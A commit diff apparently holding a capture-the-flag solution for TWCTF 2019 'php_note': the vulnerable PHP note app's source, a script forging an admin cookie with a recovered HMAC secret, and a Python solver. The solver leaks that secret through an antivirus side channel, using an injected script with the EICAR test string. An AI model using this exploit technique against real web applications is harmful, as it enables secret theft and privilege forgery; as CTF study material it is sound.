Solve TWCTF 2019 php_note

Author: Qwaz

TWCTF/2019/php_note/serialize.php

@@ -0,0 +1,33 @@
+<?php
+class Note {
+    public function __construct($admin) {
+        $this->notes = array();
+        $this->isadmin = $admin;
+    }
+    public function addnote($title, $body) {
+        array_push($this->notes, [$title, $body]);
+    }
+    public function getnotes() {
+        return $this->notes;
+    }
+    public function getflag() {
+        if ($this->isadmin === true) {
+            echo FLAG;
+        }
+    }
+}
+
+function hmac($data) {
+    $secret = "2532bd172578d19923e5348420e02320";
+    if (empty($data) || empty($secret)) return false;
+    return hash_hmac('sha256', $data, $secret);
+}
+
+$note = new Note(true);
+$data = base64_encode(serialize($note));
+
+// string(68) "Tzo0OiJOb3RlIjoyOntzOjU6Im5vdGVzIjthOjA6e31zOjc6ImlzYWRtaW4iO2I6MTt9"
+var_dump((string)$data);
+// string(64) "b6b6aa1a1732e8c83fddf6564acb50c94f59d9eaa4d6ccf4ac8ed494bb11c71f"
+var_dump((string)hmac($data));
+?>

TWCTF/2019/php_note/solver.py

@@ -0,0 +1,32 @@
+import requests
+
+URL = "http://phpnote.chal.ctf.westerns.tokyo/"
+
+
+def trigger(c, idx):
+    import string
+    sess = requests.Session()
+    # init session
+    sess.post(URL + '/?action=login', data={'realname': 'new_session'})
+    # manipulate session
+    p = '''<script>f=function(n){eval('X5O!P%@AP[4\\\\PZX54(P^)7CC)7}$$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$$H+H'+{${c}:'*'}[Math.min(${c},n)])};f(document.body.innerHTML[${idx}].charCodeAt(0));</script><body>'''
+    p = string.Template(p).substitute({'idx': idx, 'c': c})
+    resp = sess.post(URL + '/?action=login', data={'realname': '"http://127.0.0.1/flag?a=' + p, 'nickname': '</body>'})
+    return "<h1>Welcome" not in resp.text
+
+
+def leak(idx):
+    l, h = 0, 0x100
+    while h - l > 1:
+        m = (h + l) // 2
+        if trigger(m, idx):
+            l = m
+        else:
+            h = m
+    return chr(l)
+
+# "2532bd172578d19923e5348420e02320"
+secret = ''
+for i in range(14, 14+34):
+    secret += leak(i)
+    print(secret)

TWCTF/2019/php_note/source-mod.php

@@ -0,0 +1,159 @@
+<?php
+include 'config.php';
+class Note {
+    public function __construct($admin) {
+        $this->notes = array();
+        $this->isadmin = $admin;
+    }
+    public function addnote($title, $body) {
+        array_push($this->notes, [$title, $body]);
+    }
+    public function getnotes() {
+        return $this->notes;
+    }
+    public function getflag() {
+        if ($this->isadmin === true) {
+            echo FLAG;
+        }
+    }
+}
+function verify($data, $hmac) {
+    $secret = $_SESSION['secret'];
+    if (empty($secret)) return false;
+    return hash_equals(hash_hmac('sha256', $data, $secret), $hmac);
+}
+function hmac($data) {
+    $secret = $_SESSION['secret'];
+    if (empty($data) || empty($secret)) return false;
+    return hash_hmac('sha256', $data, $secret);
+}
+function gen_secret($seed) {
+    return md5(SALT . $seed . PEPPER);
+}
+function is_login() {
+    return !empty($_SESSION['secret']);
+}
+function redirect($action) {
+    header("Location: /source-mod.php?action=$action");
+    exit();
+}
+$method = $_SERVER['REQUEST_METHOD'];
+$action = $_GET['action'];
+if (!in_array($action, ['index', 'login', 'logout', 'post', 'source', 'getflag'])) {
+    redirect('index');
+}
+if ($action === 'source') {
+    highlight_file(__FILE__);
+    exit();
+}
+session_start();
+if (is_login()) {
+    $realname = $_SESSION['realname'];
+    $nickname = $_SESSION['nickname'];
+
+    $note = verify($_COOKIE['note'], $_COOKIE['hmac'])
+            ? unserialize(base64_decode($_COOKIE['note']))
+            : new Note(false);
+}
+if ($action === 'login') {
+    if ($method === 'POST') {
+        $nickname = (string)$_POST['nickname'];
+        $realname = (string)$_POST['realname'];
+        if (empty($realname) || strlen($realname) < 8) {
+            die('invalid name');
+        }
+        $_SESSION['realname'] = $realname;
+        if (!empty($nickname)) {
+            $_SESSION['nickname'] = $nickname;
+        }
+        $_SESSION['secret'] = gen_secret($nickname);
+    }
+    redirect('index');
+}
+if ($action === 'logout') {
+    session_destroy();
+    redirect('index');
+}
+if ($action === 'post') {
+    if ($method === 'POST') {
+        $title = (string)$_POST['title'];
+        $body = (string)$_POST['body'];
+        $note->addnote($title, $body);
+        $data = base64_encode(serialize($note));
+        setcookie('note', (string)$data);
+        setcookie('hmac', (string)hmac($data));
+    }
+    redirect('index');
+}
+if ($action === 'getflag') {
+    $note->getflag();
+}
+?>
+<!doctype html>
+<html>
+    <head>
+        <title>PHP note</title>
+    </head>
+    <style>
+        textarea {
+            resize: none;
+            width: 300px;
+            height: 200px;
+        }
+    </style>
+    <body>
+        <?php
+        if (!is_login()) {
+            $realname = htmlspecialchars($realname);
+            $nickname = htmlspecialchars($nickname);
+        ?>
+        <form action="/?action=login" method="post" id="login">
+            <input type="text" id="firstname" placeholder="First Name">
+            <input type="text" id="lastname" placeholder="Last Name">
+            <input type="text" name="nickname" id="nickname" placeholder="nickname">
+            <input type="hidden" name="realname" id="realname">
+            <button type="submit">Login</button>
+        </form>
+        <?php
+        } else {
+        ?>
+        <h1>Welcome, <?=$realname?><?= !empty($nickname) ? " ($nickname)" : "" ?></h1>
+        <a href="/?action=logout">logout</a>
+        <!-- <a href="/?action=source">source</a> -->
+        <br/>
+        <br/>
+        <?php
+            foreach($note->getnotes() as $k => $v) {
+                list($title, $body) = $v;
+                $title = htmlspecialchars($title);
+                $body = htmlspecialchars($body);
+        ?>
+        <h2><?=$title?></h2>
+        <p><?=$body?></p>
+        <?php
+            }
+        ?>
+        <form action="/?action=post" method="post">
+            <input type="text" name="title" placeholder="title">
+            <br>
+            <textarea name="body" placeholder="body"></textarea>
+            <button type="submit">Post</button>
+        </form>
+        <?php
+        }
+        ?>
+        <?php
+        ?>
+        <script>
+            document.querySelector("form#login").addEventListener('submit', (e) => {
+                const nickname = document.querySelector("input#nickname")
+                const firstname = document.querySelector("input#firstname")
+                const lastname = document.querySelector("input#lastname")
+                document.querySelector("input#realname").value = `${firstname.value} ${lastname.value}`
+                if (nickname.value.length == 0 && firstname.value.length > 0 && lastname.value.length > 0) {
+                    nickname.value = firstname.value.toLowerCase()[0] + lastname.value.toLowerCase()
+                }
+            })
+        </script>
+    </body>
+</html>

TWCTF/2019/php_note/source.php

@@ -0,0 +1,159 @@
+<?php
+include 'config.php';
+class Note {
+    public function __construct($admin) {
+        $this->notes = array();
+        $this->isadmin = $admin;
+    }
+    public function addnote($title, $body) {
+        array_push($this->notes, [$title, $body]);
+    }
+    public function getnotes() {
+        return $this->notes;
+    }
+    public function getflag() {
+        if ($this->isadmin === true) {
+            echo FLAG;
+        }
+    }
+}
+function verify($data, $hmac) {
+    $secret = $_SESSION['secret'];
+    if (empty($secret)) return false;
+    return hash_equals(hash_hmac('sha256', $data, $secret), $hmac);
+}
+function hmac($data) {
+    $secret = $_SESSION['secret'];
+    if (empty($data) || empty($secret)) return false;
+    return hash_hmac('sha256', $data, $secret);
+}
+function gen_secret($seed) {
+    return md5(SALT . $seed . PEPPER);
+}
+function is_login() {
+    return !empty($_SESSION['secret']);
+}
+function redirect($action) {
+    header("Location: /?action=$action");
+    exit();
+}
+$method = $_SERVER['REQUEST_METHOD'];
+$action = $_GET['action'];
+if (!in_array($action, ['index', 'login', 'logout', 'post', 'source', 'getflag'])) {
+    redirect('index');
+}
+if ($action === 'source') {
+    highlight_file(__FILE__);
+    exit();
+}
+session_start();
+if (is_login()) {
+    $realname = $_SESSION['realname'];
+    $nickname = $_SESSION['nickname'];
+
+    $note = verify($_COOKIE['note'], $_COOKIE['hmac'])
+            ? unserialize(base64_decode($_COOKIE['note']))
+            : new Note(false);
+}
+if ($action === 'login') {
+    if ($method === 'POST') {
+        $nickname = (string)$_POST['nickname'];
+        $realname = (string)$_POST['realname'];
+        if (empty($realname) || strlen($realname) < 8) {
+            die('invalid name');
+        }
+        $_SESSION['realname'] = $realname;
+        if (!empty($nickname)) {
+            $_SESSION['nickname'] = $nickname;
+        }
+        $_SESSION['secret'] = gen_secret($nickname);
+    }
+    redirect('index');
+}
+if ($action === 'logout') {
+    session_destroy();
+    redirect('index');
+}
+if ($action === 'post') {
+    if ($method === 'POST') {
+        $title = (string)$_POST['title'];
+        $body = (string)$_POST['body'];
+        $note->addnote($title, $body);
+        $data = base64_encode(serialize($note));
+        setcookie('note', (string)$data);
+        setcookie('hmac', (string)hmac($data));
+    }
+    redirect('index');
+}
+if ($action === 'getflag') {
+    $note->getflag();
+}
+?>
+<!doctype html>
+<html>
+    <head>
+        <title>PHP note</title>
+    </head>
+    <style>
+        textarea {
+            resize: none;
+            width: 300px;
+            height: 200px;
+        }
+    </style>
+    <body>
+        <?php
+        if (!is_login()) {
+            $realname = htmlspecialchars($realname);
+            $nickname = htmlspecialchars($nickname);
+        ?>
+        <form action="/?action=login" method="post" id="login">
+            <input type="text" id="firstname" placeholder="First Name">
+            <input type="text" id="lastname" placeholder="Last Name">
+            <input type="text" name="nickname" id="nickname" placeholder="nickname">
+            <input type="hidden" name="realname" id="realname">
+            <button type="submit">Login</button>
+        </form>
+        <?php
+        } else {
+        ?>
+        <h1>Welcome, <?=$realname?><?= !empty($nickname) ? " ($nickname)" : "" ?></h1>
+        <a href="/?action=logout">logout</a>
+        <!-- <a href="/?action=source">source</a> -->
+        <br/>
+        <br/>
+        <?php
+            foreach($note->getnotes() as $k => $v) {
+                list($title, $body) = $v;
+                $title = htmlspecialchars($title);
+                $body = htmlspecialchars($body);
+        ?>
+        <h2><?=$title?></h2>
+        <p><?=$body?></p>
+        <?php
+            }
+        ?>
+        <form action="/?action=post" method="post">
+            <input type="text" name="title" placeholder="title">
+            <br>
+            <textarea name="body" placeholder="body"></textarea>
+            <button type="submit">Post</button>
+        </form>
+        <?php
+        }
+        ?>
+        <?php
+        ?>
+        <script>
+            document.querySelector("form#login").addEventListener('submit', (e) => {
+                const nickname = document.querySelector("input#nickname")
+                const firstname = document.querySelector("input#firstname")
+                const lastname = document.querySelector("input#lastname")
+                document.querySelector("input#realname").value = `${firstname.value} ${lastname.value}`
+                if (nickname.value.length == 0 && firstname.value.length > 0 && lastname.value.length > 0) {
+                    nickname.value = firstname.value.toLowerCase()[0] + lastname.value.toLowerCase()
+                }
+            })
+        </script>
+    </body>
+</html>